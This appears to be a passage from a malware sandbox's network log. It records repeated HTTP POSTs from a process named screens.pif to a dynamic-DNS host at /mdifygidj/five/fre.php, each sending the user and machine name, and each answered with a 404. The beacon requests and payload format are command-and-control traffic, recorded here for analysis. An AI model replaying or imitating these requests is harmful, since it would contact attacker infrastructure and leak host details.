                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:58.201560020 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:58.212197065 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:59.153633118 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:58 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.104977145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:59.304949045 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:59.314368963 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:00.071734905 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:59 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.104977245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:00.220202923 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:00.225164890 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:01.203999043 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:00 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.104977345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:01.527808905 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:01.533864021 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:02.272135973 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:01 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.104977445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:02.428755045 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:02.438719034 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:03.139327049 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:02 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.104977545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:03.290683031 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:03.295902014 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:08.044234991 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:04 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.104977645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:08.189498901 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:08.197129965 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:09.291960001 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:08 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.104977745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:09.444485903 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:09.449762106 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:10.319149017 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:09 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.104977845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:10.494740963 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:10.502964020 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:11.227679968 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:10 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.104977945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:11.384141922 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:11.390993118 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:12.130454063 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:11 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.104978045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:12.284667015 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:12.289772987 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:13.082750082 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:12 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.104978145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:13.250464916 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:13.260240078 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:14.029635906 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:13 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.104978245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:14.177622080 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:14.183320045 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:15.259773016 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:14 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          70192.168.2.104978345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:15.419401884 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:15.428230047 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:16.293493032 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:15 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          71192.168.2.104978445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:16.448915005 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:16.459229946 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:18.382441044 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:17 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          72192.168.2.104978545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:18.535527945 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:18.541296005 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:19.163856983 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:18 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          73192.168.2.104978645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:19.318485975 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:19.323390961 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:19.984327078 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:19 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.104978745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:20.140371084 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:20.145363092 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:20.837774992 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:20 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          75192.168.2.104978845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:20.987117052 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:20.992218018 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:21.745456934 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:21 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          76192.168.2.104978945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:21.894581079 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:21.900605917 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
